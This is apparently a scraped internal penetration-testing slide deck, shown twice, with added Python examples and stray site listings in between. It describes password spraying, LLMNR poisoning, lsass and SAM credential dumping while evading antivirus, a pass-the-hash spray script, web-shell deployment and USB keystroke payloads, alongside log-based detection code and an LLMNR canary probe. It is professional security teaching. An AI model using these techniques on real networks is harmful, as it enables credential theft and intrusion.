Why Internal Pen-Tests are still FUN!
Why other pen-tests suck! (not hating)
• External – Unless you're SE'ing someone it's pretty boring. (nessus/qualys grepping human, thou art l33t)
• Web Apps – Unless you get SQLi, file upload or good business logic bugs. (Oh burp scanning/intruder ninja, thou art l33t)
• Mobile – Fun unlimited, but limited by a small attack surface
Internal Pen-Tests
• SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness!
• Nothing beats the joy of popping a box!
• If Local Admin, get Domain Admin – always a new challenge!
• Data – Oh delicious customer data!
• Mad respect from client
“More pen-tests…more monnneeyyy” – Hans Michael Varbaek
Why we still own Internal Networks
• Weak passwords – Welcome1 still works in 2013
• No patching – MS08-067 still works in 2013
• No access controls – RDP/SSH anywhere
Easy Pwnage
• This stuff still works not because you're l33t but because your customer is clueless about securing stuff.
– Password attacks
• SMB bruteforce from a list of domain users (enumerated via null sessions, or from a compromised host that gave you a domain user cred)
• ^ Check the domain password and lockout policy before going haywire: the lockout threshold and observation window decide how many guesses per account you can afford.
• SSH, MSSQL etc. (sa/sa still works in 2013)
• Metasploit auxiliary modules / Nmap NSE scripts are your best friend. (you know most of the good ones, right?)
• Run all of them if you've got time. You never know how low the fruit is hanging unless you bend down.
• Nessus/Qualys are generally pretty bad at bruteforcing stuff.
• Use intelligent word lists – mix in the company name
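The "check the password policy first" advice above, worked through as code. This is an added example, not tooling from the talk or its author: it reads the two lockout numbers `net accounts /domain` reports, builds a company-name word list, and spaces a spray so no account ever reaches the lockout threshold. The policy values, user names and company name are constructed for illustration.

```python
"""Lockout-aware password spraying plan (added example, not the talk's code)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class LockoutPolicy:
    """The two numbers that matter, as reported by `net accounts /domain`."""
    threshold: int            # "Lockout threshold": bad attempts before lockout, 0 = never
    observation_minutes: int  # "Lockout observation window": bad-attempt counter reset time


def safe_attempts_per_window(policy: LockoutPolicy, margin: int = 2) -> Optional[int]:
    """Guesses per account that fit in one observation window.

    `margin` leaves room for the real user's own typos, which count against
    the same counter. None means lockouts are disabled.
    """
    if policy.threshold == 0:
        return None
    return max(policy.threshold - margin, 0)


def company_wordlist(company: str, year: int) -> List[str]:
    """Candidates built from the company name plus the usual weak suffixes."""
    stems = [company.capitalize(), company.lower(), company.upper(),
             "Welcome", "Password", "Summer", "Winter"]
    suffixes = ["", "1", "123", "!", "1!", str(year), f"{year}!"]
    seen, words = set(), []
    for stem in stems:
        for suffix in suffixes:
            candidate = stem + suffix
            if candidate not in seen:
                seen.add(candidate)
                words.append(candidate)
    return words


def spray_schedule(users: List[str], passwords: List[str], policy: LockoutPolicy,
                   start: datetime, buffer_minutes: int = 1) -> List[Tuple[datetime, str, str]]:
    """Return (when, user, password) attempts in spray order.

    One password is tried against every user before moving to the next; after
    `safe_attempts_per_window` passwords the plan waits out the observation
    window (plus a small buffer) so no account reaches the lockout threshold.
    """
    per_window = safe_attempts_per_window(policy)
    if per_window == 0:
        raise ValueError("lockout threshold too low to spray without locking accounts")
    plan = []
    when = start
    for index, password in enumerate(passwords):
        if per_window is not None and index and index % per_window == 0:
            when += timedelta(minutes=policy.observation_minutes + buffer_minutes)
        for user in users:
            plan.append((when, user, password))
    return plan


if __name__ == "__main__":
    policy = LockoutPolicy(threshold=5, observation_minutes=30)  # constructed policy
    words = company_wordlist("Acme", 2013)                       # constructed company
    for when, user, password in spray_schedule(["alice", "bob"], words[:7], policy,
                                               datetime(2013, 6, 1, 9, 0)):
        print(when.strftime("%H:%M"), user, password)
```

With a threshold of 5 and a 30-minute window the plan allows three guesses per account, then pauses 31 minutes before the next three; a threshold of 2 or less makes `spray_schedule` refuse rather than lock the domain.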
Easy Pwnage
– Not Patching
• Any vulnerable software that Qualys/Nessus finds – if Metasploit has a module for it = easy win.
– Web consoles (I like these – find them all the time!)
• JBoss JMX console (set up shell.war and invoke the deployer)
• Tomcat manager (deploy shell.war)
– These usually run as SYSTEM on a Windows box.
• Any file upload in an internal web app (Don't waste time on this; if you do see something interesting, have a poke)
– GPO cpassword (Group Policy Preference XML in SYSVOL)
• post/windows/gather/credentials/gpp – base64-decode and then decrypt with the AES key Microsoft published in the MS-GPPREF spec
• Most likely the local administrator password (re-used across all hosts that were deployed with GPPs)
• Caveat: MS14-025 stopped new passwords being set through GPP, but Groups.xml files already sitting in SYSVOL keep their cpassword.
Easy Pwnage
• Filebrowser (a JSP file browser) – for when cmd.jsp gets picked up by AV: http://www.vonloesch.de/filebrowser.html
Laudanum
• http://sourceforge.net/projects/laudanum/files/laudanum-0.8/
• A bunch of good web shells for most languages
Why are we doing all this anyway??
• Get sensitive data and show the customer the real risk of allowing “Mr. Evil” to connect to their internal network
– Hunting for data:
• Local admin -> Domain Admin -> search for data everywhere (usually databases – unless they're really stupid and store it in unencrypted flat files)
Lesson learnt – Some clients don't even know what data is important to them.
- The CEO's mailbox is a good start
Super Secure Customer
• Everything is patched
• Super random, awesomely strong passwords
• Apps are securely coded – no SQLi and no file upload
• AV everywhere – I mean everywhere
• ^ AV can't be turned off unless you provide a password
• OMG! – I should quit pen-testing.
Responder
• Developed by Laurent Gaffié (Trustwave)
• LLMNR and NBT-NS poisoning
– When DNS and the hosts file fail to resolve a name, Windows falls back to LLMNR (multicast on UDP 5355) and then NetBIOS name service broadcasts (UDP 137). The tool yells out “I'll resolve that for you”, answers with its own IP, and the victim then authenticates to it and hands over its creds (NTLM challenge-response).
– DEMO
– Hashes can be cracked with John, or relayed: http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
• Tons of other features
– Google “responder trustwave”
– Does ICMP redirect (this is effing awesome – but only works against anything older than Vista/2k8)
– Abuses WPAD (another cool feature)
– HTTP, FTP modules.
• Make sure you are on a workstation subnet for maximum hits.
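What the poisoning reply looks like on the wire, as an added example (this is not Responder's code). LLMNR (RFC 4795) reuses the DNS message layout over UDP 5355 to multicast 224.0.0.252; the poisoner copies the victim's transaction ID and question, flips the response bit and appends one A record pointing at itself. The query for "fileserv01" and the attacker address 10.0.0.99 are constructed; nothing is sent on the network.

```python
"""LLMNR query parsing and a poisoned reply, built as bytes (added example)."""
import socket
import struct
from typing import Tuple

LLMNR_PORT = 5355
LLMNR_MCAST = "224.0.0.252"
QTYPE_A = 1
QCLASS_IN = 1


def _encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".") if label) + b"\x00"


def _decode_name(data: bytes, offset: int) -> Tuple[str, int]:
    """Read an uncompressed name at `offset`; return (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("this example does not handle compression pointers")
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid: int, name: str) -> bytes:
    """A standard LLMNR A query, like the one Windows multicasts on a name miss."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_message(data: bytes) -> dict:
    """Parse header, question section and any A answers of an LLMNR message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    offset = 12
    questions, answers = [], []
    for _ in range(qd):
        name, offset = _decode_name(data, offset)
        qtype, qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, offset = _decode_name(data, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        answers.append((name, rtype, ttl,
                        socket.inet_ntoa(rdata) if rtype == QTYPE_A else rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Answer whatever name was asked with the attacker's address.

    Nothing checks that the name exists: that is the whole point of the
    poisoning, and also why a defender's canary name (a query for a host that
    should never resolve) catches it.
    """
    parsed = parse_message(query)
    name, qtype, qclass = parsed["questions"][0]
    if qtype != QTYPE_A:
        raise ValueError("only A queries are poisoned in this example")
    header = struct.pack("!HHHHHH", parsed["id"], 0x8000, 1, 1, 0, 0)  # QR=1, 1 question, 1 answer
    question = _encode_name(name) + struct.pack("!HH", qtype, qclass)
    answer = (_encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


if __name__ == "__main__":
    q = build_query(0x1234, "fileserv01")          # constructed victim query
    r = build_poisoned_response(q, "10.0.0.99")    # assumed attacker address
    print(parse_message(r))
```

The same two functions, plus a UDP socket bound to port 5355 and joined to the multicast group, are all a poisoner needs; on the defensive side, a resolver that answers a name nobody should ask for is the simplest tell.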
OK – THAT DIDN'T WORK??
• Give up and go home??
I SAY NO!
• Meet the angry “I will pwn you” pentester!
Get your Ducky on
• HID USB thingy that has a small programmable chip; the host sees it as a keyboard, so it types whatever you scripted.
• When a user leaves a desktop/laptop unlocked, run and connect. (or walk if you're not that enthusiastic)
• Quickly add a user, enable RDP, grab password hashes, system info etc. and ship them to your FTP server. (whatever privs the user has – the Ducky has)
• Easy to write scripts – write, compile with the Java-based encoder, load onto the Ducky.
• ^ Way easier than Teensy – although Teensy can be used for stealth/SE tactics: Teensy inside a mouse, Teensy inside a keyboard etc.
DUCKY DEMO
• If it quacks like a duck – it must be a duck
• Video
SAFE PASSWORD DUMPING
• Old school password dumping tools get picked up by AV (Cain, pwdump etc.)
• New ones are getting picked up as well (WCE, mimikatz etc.) – these two can dump plain-text passwords from memory.
• Disable AV?
• What if AV can only be disabled using a password?
• You don't have to disable AV or trigger it.
• Procdump from Sysinternals (a signed Microsoft binary, which AV doesn't flag):
– C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\lsassdump.dmp
– Mimikatz can then chew the .dmp file offline on your own box (so the customer's AV never sees it) and spit out passwords in clear text.
• Some old methods still work and don't get picked up by AV – hashes from the registry hives:
• Reg save (C:\>reg.exe save HKLM\SAM sam) – grab HKLM\SYSTEM the same way (reg.exe save HKLM\SYSTEM system); it holds the boot key you need to decrypt the SAM hashes.
• Shadow volume copy (good to grab NTDS.dit, plus SYSTEM, from a DC)
• ^ Ops guys now do check logs for shadow volume copies, so I'd recommend using SAMEX. (http://www.josho.org/blog//blog/2013/03/07/samex/)
Searching for Domain Admin
• So you popped a few boxes – got some hashes
• What now?
• If one of those boxes:
– had a domain admin logged in – you have his password in plain-text or his hash -> game over.
– had a service running as domain admin – migrate into the process, pop a shell -> game over.
• Shares the same local administrator password across the network.
– Spray the hash and look for boxes with processes running as domain admin.
#!/bin/sh
# Spray one local admin hash across every host in ip.txt and record who runs what.
# A pass-the-hash build of winexe takes the hash in place of the password.
for ip in $(cat ip.txt); do
    ./winexe -U 'Administrator%passwordhash' "//$ip" "ipconfig"
    ./winexe -U 'Administrator%passwordhash' "//$ip" "tasklist /v"
done
• ^ The Metasploit module auxiliary/admin/smb/psexec_command also works. Do not use exploit/windows/smb/psexec, as this uploads an exe to the box and will trigger AV.
• Log in to the box running the domain admin process – dump the hash, or read it from lsass as plain text.
• Replay the hash, or log in as domain admin over RDP etc.
• Game over.
– Pro stealth tip: once you get a domain admin shell, DO NOT CREATE a new domain admin user.
• This will trigger Ops, as a lot of organisations are alerted when a new domain administrator is created.
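Post-processing the per-host `tasklist /v` output the winexe loop above collects, as an added example (not the talk's own tooling): it parses the fixed-width tasklist layout by reading the column widths off the `=` separator line and reports every process whose account is in the Domain Admins list, across all hosts. The two hosts, their process lists and the `DOMAIN_ADMINS` list are constructed; in practice the list comes from `net group "Domain Admins" /domain`.

```python
"""Find hosts where a process runs under a privileged domain account (added example)."""
import re
from typing import Dict, Iterable, List, Tuple

# Fixed-width layout of `tasklist /v`. The parser takes the real widths from the
# separator line; this table is only used to render the constructed sample.
_COLUMNS = [("Image Name", 25, "<"), ("PID", 8, ">"), ("Session Name", 16, "<"),
            ("Session#", 11, ">"), ("Mem Usage", 12, ">"), ("Status", 15, "<"),
            ("User Name", 50, "<"), ("CPU Time", 12, ">"), ("Window Title", 72, "<")]


def render_tasklist(rows: Iterable[Tuple[str, ...]]) -> str:
    """Render rows in tasklist /v layout (used only to build sample data)."""
    header = " ".join(f"{name:{align}{width}}" for name, width, align in _COLUMNS)
    separator = " ".join("=" * width for _, width, _ in _COLUMNS)
    body = [" ".join(f"{value:{align}{width}}" for value, (_, width, align) in zip(row, _COLUMNS))
            for row in rows]
    return "\n".join(["", header, separator, *body, ""])


def parse_tasklist_v(text: str) -> List[Dict[str, str]]:
    """Parse `tasklist /v` output into dicts keyed by column header."""
    lines = [line for line in text.splitlines() if line.strip()]
    for index, line in enumerate(lines):
        if set(line.strip()) <= {"=", " "}:
            break
    else:
        raise ValueError("no tasklist separator line found")
    if index == 0:
        raise ValueError("separator line has no header above it")
    header, separator = lines[index - 1], lines[index]
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", separator)]
    columns = [header[start:end].strip() for start, end in spans]
    rows = []
    for data in lines[index + 1:]:
        row = {}
        for column, (start, end) in zip(columns, spans):
            # The last column (Window Title) may run past the separator width.
            row[column] = data[start:].strip() if column == columns[-1] else data[start:end].strip()
        rows.append(row)
    return rows


def find_privileged_processes(outputs: Dict[str, str],
                              privileged_accounts: Iterable[str]) -> List[Tuple[str, str, int, str]]:
    """Return (host, image, pid, account) for every process running as a
    privileged account, across the per-host tasklist outputs (case-insensitive)."""
    wanted = {account.lower() for account in privileged_accounts}
    hits = []
    for host, text in outputs.items():
        for row in parse_tasklist_v(text):
            if row["User Name"].lower() in wanted:
                hits.append((host, row["Image Name"], int(row["PID"]), row["User Name"]))
    return sorted(hits)


# Constructed sample: two hosts, one of them running a backup agent as a DA.
SAMPLE_OUTPUTS = {
    "10.0.0.11": render_tasklist([
        ("System", "4", "Services", "0", "1,234 K", "Unknown", "NT AUTHORITY\\SYSTEM", "0:00:10", "N/A"),
        ("lsass.exe", "612", "Services", "0", "12,344 K", "Unknown", "NT AUTHORITY\\SYSTEM", "0:00:12", "N/A"),
        ("sqlservr.exe", "1804", "Services", "0", "240,112 K", "Unknown", "CORP\\svc_sql", "0:05:44", "N/A"),
    ]),
    "10.0.0.12": render_tasklist([
        ("lsass.exe", "628", "Services", "0", "11,900 K", "Unknown", "NT AUTHORITY\\SYSTEM", "0:00:09", "N/A"),
        ("backupagent.exe", "2212", "Services", "0", "18,020 K", "Unknown", "CORP\\da_backup", "0:00:03", "N/A"),
        ("explorer.exe", "3140", "Console", "1", "54,220 K", "Running", "CORP\\jsmith", "0:01:10", "Program Manager"),
    ]),
}
# Assumed result of `net group "Domain Admins" /domain`, prefixed with the domain.
DOMAIN_ADMINS = ["CORP\\da_backup", "CORP\\administrator"]

if __name__ == "__main__":
    for host, image, pid, account in find_privileged_processes(SAMPLE_OUTPUTS, DOMAIN_ADMINS):
        print(f"{host}: {image} (pid {pid}) runs as {account}")
```

Feed it the real files (`outputs = {ip: open(f"{ip}.tasklist").read() for ip in ips}`) and the hit list is the box to land on next; a `PID` that fails `int()` means the line was not tasklist output (an error banner, for instance), which is worth surfacing rather than skipping.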
Looting
• Go after SQL servers – you should have a list of these from your scans
• Shares – yes, people still store heaps of confidential stuff unencrypted on shares
• Have you guys seen Firefox PTH? – All your OWA and SharePoint are belong to us!
• Metasploit – post exploitation modules – store loot in the MSF DB for grepping later.
Firefox PTH
• DEMO
• https://code.google.com/p/passing-the-hash/downloads/list
Mitigations
• You can't really stop a determined attacker
• There are just way too many ways you could get hacked
• Best bet is to detect
• Check anomalies – new user creation (DA etc.), local admin logons, AV pickups etc.
• User education
• Google's new n/w architecture – all zones are untrusted (not a bad idea, eh?)
• Obvious old school protections should still apply – patching, strong passwords, access controls etc.
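The anomaly checks above, and the earlier stealth tip that creating a new domain admin gets noticed, as detection logic in an added example (not from the talk). It runs four rules over Windows Security events already parsed into dicts (field names follow the event XML: `SubjectUserName`, `TargetUserName`, `LogonType`, ...): account creation (4720), membership changes to privileged groups (4728/4732/4756), interactive logons by the built-in Administrator (RID 500), and one source using that account over the network against several hosts, which is the shared-local-admin hash spray the slides describe. The events, hosts, users and the spray threshold are constructed.

```python
"""Detection rules for the anomalies on the Mitigations slide (added example)."""
from collections import defaultdict
from typing import Dict, List

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to global / local / universal group
INTERACTIVE_LOGONS = {2, 10}            # console and RDP
NETWORK_LOGON = 3                       # SMB, psexec/winexe style


def _is_builtin_admin(event: Dict) -> bool:
    """The built-in Administrator account always has RID 500, whatever its name."""
    return str(event.get("TargetUserSid", "")).endswith("-500")


def detect(events: List[Dict], spray_threshold: int = 2) -> List[Dict]:
    """Return one alert dict per finding, in event order (spray alerts last)."""
    alerts = []
    rid500_network_sources = defaultdict(set)  # source IP -> hosts reached as RID 500
    for event in events:
        eid = event["EventID"]
        if eid == 4720:
            alerts.append({"rule": "account_created", "host": event["Computer"],
                           "actor": event["SubjectUserName"], "target": event["TargetUserName"]})
        elif eid in GROUP_ADD_EVENTS and event.get("TargetUserName") in PRIVILEGED_GROUPS:
            alerts.append({"rule": "privileged_group_change", "host": event["Computer"],
                           "actor": event["SubjectUserName"], "group": event["TargetUserName"],
                           "member": event.get("MemberName", "")})
        elif eid == 4624 and _is_builtin_admin(event):
            logon_type = int(event.get("LogonType", 0))
            if logon_type in INTERACTIVE_LOGONS:
                alerts.append({"rule": "builtin_admin_interactive_logon", "host": event["Computer"],
                               "logon_type": logon_type, "source": event.get("IpAddress", "-")})
            elif logon_type == NETWORK_LOGON:
                rid500_network_sources[event.get("IpAddress", "-")].add(event["Computer"])
    # One source hitting several hosts as the local Administrator over the network
    # is what a shared local admin hash being sprayed looks like from the logs.
    for source, hosts in rid500_network_sources.items():
        if len(hosts) >= spray_threshold:
            alerts.append({"rule": "shared_local_admin_spray", "source": source,
                           "hosts": sorted(hosts)})
    return alerts


SAMPLE_EVENTS = [  # constructed; machine SIDs differ per host, the RID 500 suffix does not
    {"EventID": 4720, "Computer": "DC01", "SubjectUserName": "jsmith", "TargetUserName": "svc_backup2"},
    {"EventID": 4728, "Computer": "DC01", "SubjectUserName": "jsmith", "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_backup2,CN=Users,DC=corp,DC=local"},
    {"EventID": 4624, "Computer": "WS042", "TargetUserName": "Administrator",
     "TargetUserSid": "S-1-5-21-1111-2222-3333-500", "LogonType": 10, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Computer": "WS042", "TargetUserName": "jsmith",
     "TargetUserSid": "S-1-5-21-1111-2222-3333-1105", "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4624, "Computer": "WS043", "TargetUserName": "Administrator",
     "TargetUserSid": "S-1-5-21-4444-5555-6666-500", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Computer": "WS044", "TargetUserName": "Administrator",
     "TargetUserSid": "S-1-5-21-7777-8888-9999-500", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventID": 4732, "Computer": "WS042", "SubjectUserName": "jsmith",
     "TargetUserName": "Remote Desktop Users", "MemberName": "CORP\\jsmith"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Matching on the SID suffix rather than the name catches a renamed Administrator account; the last sample event (a non-privileged group change) produces nothing, and raising `spray_threshold` to 3 drops the spray alert for a source that only touched two hosts.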
Testing “Pro” tips
• Don't leave any accounts you create on the customer's network – delete everything (finding a DA account left by the pen-tester from the last engagement = fail)
• Bruteforce wisely – locking out an important service will not go down well with a customer (bump down threads = increase stealth)
• Don't disable AV – intelligent Ops are alerted if AV dies
• Wipe your VM after every pen-test – a clean slate to work on is so much better
• Snapshotting to have all your tools set up and then resetting also works
• script(1) on Linux is your best friend – it records the whole terminal session
• Notes – always good for other eyes trying to read and understand what you did (doesn't even have to be fancy – vi or notepad works)
• Videos for complex attacks – I'd highly recommend it (mind you, this is gonna eat some disk space and sending it to a client might be difficult)
Music (Ignore this slide if you don't listen to music)
• Meshuggah, Lamb of God and Tool – when you're feeling effing awesome and pwning like a baws
• Trying really hard for a breakthrough or fighting a problem – really fast techno or dubstep
• When you lose it and wanna break your laptop – Vitamin String Quartet (trust me, this works)
That's it
• Things I want to work on (any help will earn beers and respect):
– Write more Ducky scripts (hopefully run faster and grab more stuff, reverse shell etc.)
– Write post-exploit modules (which can loot more efficiently)
– Set up a Pi that can do all this over 3G/4G, to be sent to the client so I can watch BSG and sip beer.
– Hope this helped. Google for anything that I may not have provided a link for or explained in detail.
Blog: http://psychsec.wordpress.com/

Simplifying Microservices & Apps - The art of effortless development - Meetup...
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration tools
 
SoftTeco - Software Development Company Profile
SoftTeco - Software Development Company ProfileSoftTeco - Software Development Company Profile
SoftTeco - Software Development Company Profile
 
VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
 

Why internal pen tests are still fun

1. Why Internal Pen-Tests are still FUN !

2. Why other pen-tests suck ! (not hating)
• External – Unless you're SE'ing someone it's pretty boring. (nessus/qualys grepping human thou art l33t)
• Web Apps – Unless you get SQLi or file upload or good business logic bugs. (Oh burp scanning/intruder ninja thou art l33t)
• Mobile – Fun unlimited but limited by small threat surface

3. Internal Pen-Tests
• SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness!
• Nothing beats the joy of popping a box !
• If Local Admin, get Domain Admin – always a new challenge !
• Data – Oh delicious customer data !
• Mad respect from client
"More pen-tests…more monnneeyyy" – Hans Michael Varbaek

4. Why we still own Internal Networks
• Weak passwords – Welcome1 still works in 2013

5. Why we still own Internal Networks
• No patching – MS08-067 still works in 2013

6. Why we still own Internal Networks
• No access controls – RDP/SSH anywhere

7. Easy Pwnage
• This stuff still works not because you're l33t but because your customer is clueless about securing stuff.
  – Password attacks
    • SMB bruteforce from a list of domain users (null sessions, or using a compromised host that gave you a domain user cred)
    • ^ check the password policy before going haywire.
    • SSH, MSSQL etc (sa,sa still works in 2013)
    • Metasploit auxiliary modules / Nmap scripts are your best friend. (you know most of the good ones r8 ?)
    • Run all of them if you've got time. You never know how low the fruit is hanging unless you bend down.
    • Nessus/Qualys generally are pretty bad at bruteforcing stuff.
    • Use intelligent word lists – mix in the company name

8. Easy Pwnage
  – Not Patching
    • Any vulnerable software that Qualys/Nessus finds – if metasploit has a module for it = easy win.
  – Web consoles (I like these – find them all the time!)
    • JBoss JMX consoles (set up shell.war and invoke)
    • Tomcat manager (deploy shell.war)
  – These usually run as SYSTEM on a windows box.
    • Any file upload from a web app that is internal (Don't waste time on this, if you do see something interesting have a poke)
  – GPO cpassword (Group Policy Preference XML)
    • post/windows/gather/credentials/gpp – de-base64 and then decrypt using the MS provided public AES key
    • Most likely the local administrator password (re-used across all hosts that were deployed with GPPs)

9. Easy Pwnage
• Filebrowser -> when cmd.jsp gets picked up by AV
  http://www.vonloesch.de/filebrowser.html

13. Why are we doing all this anyway ??
• Get sensitive data and show the customer the real risk of allowing "Mr.Evil" to connect to their internal network
  – Hunting for data :
    • Local admin -> Domain Admin -> Search for data everywhere (usually databases – unless they're really stupid and store it in unencrypted flat files)
• Lesson learnt – Some clients don't even know what data is important to them.
  – CEO's Mailbox is a good start

14. Super Secure Customer
• Everything is patched
• Super random awesomely strong passwords
• Apps are securely coded – no SQLi and no file upload
• AV everywhere – I mean everywhere
• ^ AV can't be turned off unless you provide a password
• OMG ! – I should quit pen-testing.

15.

16. Responder
• Developed by Laurent Gaffié (Trustwave)
• LLMNR and NBT-NS poisoning (Google for what this is)
  – If DNS and the hosts file fail, the tool yells out saying "I'll resolve that for you" and then steals your creds !
  – DEMO
  – Hashes can be cracked via John or can be relayed: http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python

17. Responder
• Tons of other features – Google "responder trustwave"
  – Does ICMP re-direct (this is effing awesome – but only works for anything older than Vista/2k8)
  – Abuses WPAD (Another kool feature)
  – HTTP, FTP module.
• Make sure you are on a workstation subnet for maximum hits.
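The defender's counterpart to the LLMNR poisoning on the two Responder slides is a canary probe: ask LLMNR for a name that does not exist anywhere on the network and treat any answer as a poisoner, since no legitimate host should claim it. This added example (not from the talk or the Responder project) builds such a query and checks a reply; the canary name, transaction ID and the poisoned reply bytes are constructed, and 224.0.0.252:5355 is the real LLMNR multicast group and port a live sender would use.

```python
"""Canary probe for LLMNR poisoning: nobody should answer for a made-up name."""
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # LLMNR multicast group and port (for a live send)
CANARY, TXID = "canary-host-a1b2", 0x1234      # constructed; no such host exists anywhere

def encode_name(name):
    """DNS-style encoding: length-prefixed labels, zero terminator."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def decode_name(data, off):
    labels = []
    while data[off]:
        labels.append(data[off + 1:off + 1 + data[off]].decode())
        off += 1 + data[off]
    return ".".join(labels), off + 1

def build_query(name, txid):
    """LLMNR reuses the DNS header: id, flags, qdcount, ancount, nscount, arcount."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)

def check_response(pkt, canary, txid):
    """A records a responder claims for our canary, or None if pkt is not such an answer."""
    if len(pkt) < 12:
        return None
    rid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if rid != txid or not flags & 0x8000 or an == 0:  # 0x8000 = QR bit (this is a response)
        return None
    off, qname = 12, ""
    for _ in range(qd):
        qname, off = decode_name(pkt, off)
        off += 4                                      # skip QTYPE/QCLASS
    if qname.lower() != canary.lower():
        return None
    addrs = []
    for _ in range(an):
        _, off = decode_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:                 # A record -> dotted quad
            addrs.append(".".join(str(b) for b in pkt[off:off + 4]))
        off += rdlen
    return {"canary": canary, "answers": addrs}

# Constructed sample of a poisoned reply: QR bit set, one A record pointing at the poisoner.
POISONED_REPLY = (struct.pack(">HHHHHH", TXID, 0x8000, 1, 1, 0, 0)
                  + encode_name(CANARY) + struct.pack(">HH", 1, 1)
                  + encode_name(CANARY) + struct.pack(">HHIH", 1, 1, 30, 4)
                  + bytes([192, 168, 1, 42]))
```

In live use, send build_query(CANARY, TXID) to the LLMNR group from a workstation subnet and pass every datagram that comes back through check_response; a non-None result gives you the address that answered for a host that does not exist.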
18. OK – THAT DIDN'T WORK ??
• Give up and go home ??

19. I SAY NO !
• Meet the angry, "I will pwn you" pentester !

20. Get your Ducky on
• HID usb thingy that has a small programmable chip.
• When a user leaves their desktop/laptop unlocked, run and connect. (or walk if you're not that enthusiastic)
• Quickly add a user, enable rdp, grab password hashes, system info etc and ship to ur ftp server. (whatever privs the user has – ducky has)
• Easy to write scripts – write, compile with java, load onto Ducky.
• ^ Way easier than teensy – Although teensy can be used in stealth/SE tactics. Teensy inside mouse, teensy inside keyboard etc.

21. DUCKY DEMO
• If it quacks like a duck – it must be a duck
• Video

22. SAFE PASSWORD DUMPING
• Old school password dumping tools get picked up by AV (cain, pwdump etc)
• New ones are getting picked up as well (WCE, mimikatz etc)
  – These two can dump plain-text passwords from memory.
• Disable AV ?
• What if AV can only be disabled using a password ?

23. SAFE PASSWORD DUMPING
• You don't have to disable AV or trigger it.
• Procdump from sysinternals
  – C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\lsassdump.dmp
  – Mimikatz can then chew the .dmp file and spit out passwords in clear text.

24. SAFE PASSWORD DUMPING
• Some old methods still work and don't get picked up by AV – hashes from hives:
  • Reg copy (C:\>reg.exe save HKLM\SAM sam)
  • Shadow volume copy (good to grab NTDS)
  • ^ Ops guys now do check logs for shadow volume copies, so I'd recommend using SAMEX. (http://www.josho.org/blog//blog/2013/03/07/samex/)

25. Searching for Domain Admin
• So you popped a few boxes – got some hashes
• What now ?
• If one of those boxes :
  – had a domain admin logged in – you have his password in plain-text or got his hash -> game over.
  – had a service running as domain admin – move to the process, pop a shell -> game over.
• Shares the same local administrator password across the network.
  – Spray the hash and look for boxes with processes running as domain admin.

26. Searching for Domain Admin
  #!/bin/sh
  for ip in $(cat ip.txt); do
    ./winexe -U Administrator%passwordhash //$ip "ipconfig"
    ./winexe -U Administrator%passwordhash //$ip "tasklist /v"
  done
